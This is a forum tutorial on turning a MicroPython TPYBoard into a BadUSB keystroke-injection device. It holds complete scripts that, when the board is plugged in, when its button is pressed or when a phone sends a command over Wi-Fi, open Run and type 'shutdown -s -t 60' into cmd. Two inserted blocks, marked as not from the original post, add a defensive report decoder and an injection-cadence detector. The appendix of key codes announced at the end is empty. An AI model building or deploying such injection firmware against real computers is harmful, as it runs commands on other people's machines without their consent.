This post was last edited by bodasister on 2016-7-21 09:57.
Original work, copyright reserved; reposts must credit the author and link to the original source. This article uses the TPYBoard v101 development board as an example to explain the main method of testing a BadUSB USB-HID device with MicroPython, and runs a simple experiment with an MT7681 module: remote keyboard input from a phone.
0x01 Introduction
MicroPython is Python running on a microcontroller: if you know Python 3.x, you can do hardware development the way you would with Arduino. Since MicroPython was released, more and more people have been studying it and using it for projects. I have done some research of my own and found that working in Python really is convenient and simple. Many development boards now support MicroPython, such as pyboard, pyMagic and TPYBoard.
(Pictured: pyboard, pyMagic, TPYBoard)
Recently I got a TPYBoard V10 online and studied it, in particular testing its built-in USB-HID function. The pleasant surprise is that you can test HID attack postures knowing only Python. For details on using the TPYBoard v101, see the MicroPython website.
0x02 Simulating a keyboard with the TPYBoard V101
Getting started with the board is skipped here; interested readers can check the MicroPython site. When the TPYBoard v101 emulates a keyboard, every transmission is 8 bytes; once you understand what these 8 bytes mean, you can do HID emulation.
The 8 bytes the keyboard sends: BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8. BYTE1 carries the modifier keys, one bit per key:
BYTE1 --
|--bit0: Left Control, 1 when pressed
|--bit1: Left Shift, 1 when pressed
|--bit2: Left Alt, 1 when pressed
|--bit3: Left GUI, 1 when pressed
|--bit4: Right Control, 1 when pressed
|--bit5: Right Shift, 1 when pressed
|--bit6: Right Alt, 1 when pressed
|--bit7: Right GUI, 1 when pressed
BYTE3 to BYTE8 hold the key codes of the keys currently pressed (see the appendix in 0x06). For example:
Pressing Left Shift + a sends 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00.
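The report format above is also what a defender sees in a USB capture of a keystroke-injection device. The following decoder is an added example, not code from the original post: it turns a stream of 8-byte reports back into the keystrokes they represent, applying the BYTE1 modifier bits and treating each key as typed once when it first appears (the all-zero release report adds nothing). It assumes the standard HID usage IDs (keyboard page 0x07, US layout); `reports_from_keys` is a constructed helper that mimics the press/release pairs the post's `press_key_once`/`release_key_once` functions send.

```python
# Added example, not from the original post: decode a stream of 8-byte USB HID
# boot-keyboard reports (the format pyb.USB_HID().send() emits) back into the
# keystrokes they represent, e.g. when reviewing a USB capture or a firmware's
# key tables. Assumes standard HID usage IDs (keyboard page 0x07, US layout).

MODIFIERS = ["LCtrl", "LShift", "LAlt", "LGUI", "RCtrl", "RShift", "RAlt", "RGUI"]

# usage ID -> (unshifted, shifted); covers the keys this kind of firmware uses
KEYMAP = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[0x04 + i] = (ch, ch.upper())
for i, ch in enumerate("1234567890"):
    KEYMAP[0x1E + i] = (ch, "!@#$%^&*()"[i])
KEYMAP.update({0x28: ("\n", "\n"), 0x2B: ("\t", "\t"), 0x2C: (" ", " "),
               0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"),
               0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"),
               0x34: ("'", '"'), 0x36: (",", "<"), 0x37: (".", ">"),
               0x38: ("/", "?")})

def decode_reports(reports):
    """Return the text typed by a sequence of 8-byte reports.

    A key counts once, when it first shows up in bytes 3..8 (press); the
    all-zero release report that follows adds nothing. Non-Shift modifiers
    become <LGUI+r>-style tokens, unknown usage IDs become <0x..>."""
    out, held = [], set()
    for rep in reports:
        if len(rep) != 8:
            raise ValueError("boot keyboard report must be 8 bytes")
        mods = [MODIFIERS[b] for b in range(8) if rep[0] & (1 << b)]  # BYTE1 bits
        shift = any("Shift" in m for m in mods)
        others = [m for m in mods if "Shift" not in m]
        now = {k for k in rep[2:8] if k}      # up to 6 concurrent key codes
        for key in sorted(now - held):        # keys newly pressed in this report
            plain, shifted = KEYMAP.get(key, ("<0x%02x>" % key,) * 2)
            text = shifted if shift else plain
            out.append("<%s+%s>" % ("+".join(others), text) if others else text)
        held = now
    return "".join(out)

def reports_from_keys(keys, modifier=0):
    """Constructed helper: the press/release report pairs that a
    press_key_once()/release_key_once() loop sends for each key code."""
    reps = []
    for k in keys:
        reps.append(bytes([modifier, 0, k, 0, 0, 0, 0, 0]))  # press
        reps.append(bytes(8))                                 # release
    return reps
```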
Below, pressing Left GUI + R is used to walk through the implementation.
Step 1: edit boot.py as follows:
```python
import machine
import pyb
#pyb.main('main.py') # main script to run after this one
#pyb.usb_mode('CDC+MSC') # act as a serial and a storage device
pyb.usb_mode('CDC+HID', hid=pyb.hid_keyboard)  # enumerate as serial port + USB keyboard
```
Step 2: edit main.py as follows:
```python
# main.py -- put your code here!
import pyb

hid = pyb.USB_HID()

def release_key_once():
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = 0
    hid.send(buf)  # key released
    pyb.delay(10)

def press_key_once(key):
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = key
    hid.send(buf)  # key pressed
    pyb.delay(10)

def press_2key(key1, key2):
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = key1  # modifier bitmask (BYTE1)
    buf[2] = key2  # key code (BYTE3)
    hid.send(buf)  # modifier + key pressed
    pyb.delay(10)

def release_2key():
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = 0
    buf[2] = 0
    hid.send(buf)  # keys released
    pyb.delay(10)

pyb.delay(1000)  # 1 s delay before starting
press_2key(0x08, 0x15)  # Left GUI + r; key codes are in the appendix
release_2key()
```
Step 3: safely eject the TPYBoard v101, then press the RST button; after one second the "Run" dialog pops up.
0x03 A simple HID test
The test opens the "Run" dialog, types cmd, and once the cmd window appears types shutdown -s -t 60, which shuts the machine down automatically after 60 seconds.
main.py is as follows:
```python
# main.py -- put your code here!
import pyb

hid = pyb.USB_HID()

def release_key_once():
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = 0
    hid.send(buf)  # key released
    pyb.delay(10)

def press_key_once(key):
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = key
    hid.send(buf)  # key pressed
    pyb.delay(10)

def press_2key(key1, key2):
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = key1  # modifier bitmask (BYTE1)
    buf[2] = key2  # key code (BYTE3)
    hid.send(buf)  # modifier + key pressed
    pyb.delay(10)

def release_2key():
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = 0
    buf[2] = 0
    hid.send(buf)  # keys released
    pyb.delay(10)

pyb.delay(1000)  # 1 s delay before starting
press_2key(0x08, 0x15)  # Left GUI + r; key codes are in the appendix
release_2key()
pyb.delay(100)
a = [0x06, 0x10, 0x07, 0x28]  # cmd + Enter
for i in a:
    press_key_once(i)
    release_key_once()
pyb.delay(1000)
# shutdown -s -t 60 + Enter
a = [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c, 0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28]
for i in a:
    press_key_once(i)
    release_key_once()
pyb.delay(1000)
```
The effect when the program runs: as soon as the board is plugged into the computer, the "Run" dialog pops up, cmd is typed into it, the cmd window appears, shutdown -s -t 60 plus Enter is typed there, and the computer shuts down one minute later.
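From the defender's side, the notable property of the script above is its cadence: every key is a 10 ms press plus a 10 ms release, so a whole command arrives in a few hundred milliseconds with no pauses, which sustained human typing does not do. The following host-side heuristic is an added example, not code from the original post; the timestamped event list is constructed and the thresholds (50 ms gap, 8 keys) are assumptions a real monitor would tune.

```python
# Added example, not from the original post: a host-side heuristic that flags
# keystroke injection by cadence. The firmware above emits one key every ~20 ms
# (10 ms press + 10 ms release) with no pauses. Input is a constructed list of
# (timestamp_ms, usage_id) press events, as a USB trace or keyboard hook might
# provide. Thresholds are assumptions, not measured values.

def burst_stats(events, max_gap_ms=50):
    """Split press events into bursts separated by gaps larger than
    max_gap_ms; return (keys_in_burst, mean_gap_ms) for each burst."""
    if not events:
        return []
    bursts, cur = [], [events[0]]
    for prev, ev in zip(events, events[1:]):
        if ev[0] - prev[0] > max_gap_ms:   # pause: close the current burst
            bursts.append(cur)
            cur = []
        cur.append(ev)
    bursts.append(cur)
    stats = []
    for b in bursts:
        gaps = [b[i + 1][0] - b[i][0] for i in range(len(b) - 1)]
        stats.append((len(b), sum(gaps) / len(gaps) if gaps else 0.0))
    return stats

def looks_injected(events, min_keys=8, max_gap_ms=50):
    """True if some burst of at least min_keys keys never pauses more than
    max_gap_ms between keys: the signature of scripted HID input."""
    return any(n >= min_keys for n, _ in burst_stats(events, max_gap_ms))

# Constructed samples: the post's "shutdown -s -t 60" + Enter key list replayed
# at the firmware's 20 ms cadence, and a person typing "cmd" + Enter.
INJECTED = [(1000 + 20 * i, k) for i, k in enumerate(
    [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c,
     0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28])]
HUMAN = [(1000, 0x06), (1180, 0x10), (1420, 0x07), (2100, 0x28)]

if __name__ == "__main__":
    print("injected:", burst_stats(INJECTED), "->", looks_injected(INJECTED))
    print("human:   ", burst_stats(HUMAN), "->", looks_injected(HUMAN))
```

A production monitor would combine this with the event that matters most here: a new keyboard enumerating on the bus immediately before the burst.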
0x04 DIY one-button shutdown
The TPYBoard v101 has a USR button, which can be used to build a one-button shutdown. Once the program is running, pressing USR raises an interrupt, LED3 blinks once, and the shutdown sequence runs. The code:
```python
# main.py -- put your code here!
import pyb

FLAG = 0  # flag: set to 1 by the button callback to run the shutdown sequence

def release_key_once():
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = 0
    hid.send(buf)  # key released
    pyb.delay(10)

def press_key_once(key):
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = key
    hid.send(buf)  # key pressed
    pyb.delay(10)

def press_2key(key1, key2):
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = key1  # modifier bitmask (BYTE1)
    buf[2] = key2  # key code (BYTE3)
    hid.send(buf)  # modifier + key pressed
    pyb.delay(10)

def release_2key():
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = 0
    buf[2] = 0
    hid.send(buf)  # keys released
    pyb.delay(10)

def shutdownpc():
    # USR button interrupt callback: blink LED3 and raise the flag;
    # the HID reports themselves are sent from the main loop
    global FLAG
    pyb.LED(3).on()
    FLAG = 1
    pyb.delay(300)
    pyb.LED(3).off()

hid = pyb.USB_HID()
sw = pyb.Switch()
sw.callback(shutdownpc)

while True:  # LED2 blinks to show the board is running
    pyb.LED(2).toggle()
    pyb.delay(300)
    print(FLAG)
    if FLAG == 1:
        pyb.delay(1000)  # 1 s delay before starting
        press_2key(0x08, 0x15)  # Left GUI + r; key codes are in the appendix
        release_2key()
        pyb.delay(100)
        a = [0x06, 0x10, 0x07, 0x28]  # cmd + Enter
        for i in a:
            press_key_once(i)
            release_key_once()
        pyb.delay(1000)
        # shutdown -s -t 60 + Enter
        a = [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c, 0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28]
        for i in a:
            press_key_once(i)
            release_key_once()
        pyb.delay(1000)
        FLAG = 0
```
0x05 Remote keyboard input from a phone
In this experiment I used an MT7681 Wi-Fi module, which provides transparent serial pass-through. Connect the MT7681 to the TPYBoard v101 as shown in the wiring diagram below. UART3 of the TPYBoard v101 is used, at 115200 baud. The code:
```python
# main.py -- put your code here!
import pyb

FLAG = 0  # 1: run the shutdown sequence, 2: open Notepad

def release_key_once():
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = 0
    hid.send(buf)  # key released
    pyb.delay(10)

def press_key_once(key):
    buf = bytearray(8)  # report is 8 bytes long
    buf[2] = key
    hid.send(buf)  # key pressed
    pyb.delay(10)

def press_2key(key1, key2):
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = key1  # modifier bitmask (BYTE1)
    buf[2] = key2  # key code (BYTE3)
    hid.send(buf)  # modifier + key pressed
    pyb.delay(10)

def release_2key():
    buf = bytearray(8)  # report is 8 bytes long
    buf[0] = 0
    buf[2] = 0
    hid.send(buf)  # keys released
    pyb.delay(10)

def shutdownpc():
    # USR button interrupt callback
    global FLAG
    pyb.LED(3).on()
    FLAG = 1
    pyb.delay(1000)
    pyb.LED(3).off()

def getchars():
    # called when the phone sends 's' over the serial link
    global FLAG
    pyb.LED(3).on()
    FLAG = 2
    pyb.delay(1000)
    pyb.LED(3).off()

hid = pyb.USB_HID()
sw = pyb.Switch()
sw.callback(shutdownpc)
u1 = pyb.UART(3, 115200)  # UART3 is wired to the MT7681
u1.init(115200, bits=8, parity=None, stop=1)
u1.write('Hello world!')
buf = ''
#print(buf)
while True:  # LED2 blinks to show the board is running
    buf = u1.readline()  # bytes the phone sent through the MT7681 (None on timeout)
    print(buf)
    if buf == b's':
        getchars()
    pyb.LED(2).toggle()
    pyb.delay(1300)
    print(FLAG)
    if FLAG == 1:
        pyb.delay(1000)  # 1 s delay before starting
        press_2key(0x08, 0x15)  # Left GUI + r; key codes are in the appendix
        release_2key()
        pyb.delay(100)
        a = [0x06, 0x10, 0x07, 0x28]  # cmd + Enter
        for i in a:
            press_key_once(i)
            release_key_once()
        pyb.delay(1000)
        # shutdown -s -t 60 + Enter
        a = [0x16, 0x0b, 0x18, 0x17, 0x07, 0x12, 0x1a, 0x11, 0x2c, 0x2d, 0x16, 0x2c, 0x2d, 0x17, 0x2c, 0x23, 0x27, 0x28]
        for i in a:
            press_key_once(i)
            release_key_once()
        pyb.delay(1000)
        FLAG = 0
    if FLAG == 2:
        pyb.delay(1000)  # 1 s delay before starting
        press_2key(0x08, 0x15)  # Left GUI + r; key codes are in the appendix
        release_2key()
        pyb.delay(100)
        a = [0x11, 0x12, 0x17, 0x08, 0x13, 0x04, 0x07, 0x28]  # notepad + Enter
        for i in a:
            press_key_once(i)
            release_key_once()
        pyb.delay(1000)
        FLAG = 0
```
At this point the phone works like a remote keyboard and can drive keyboard input directly. With a little more work on the program you could build a decent phone keyboard. And since data can also be sent back over the serial port, you could write a host-side program on the PC to return the results of the PC-side actions. Further extensions are left to the reader; that is all for now.
0x06 Appendix
The main MicroPython key codes are as follows: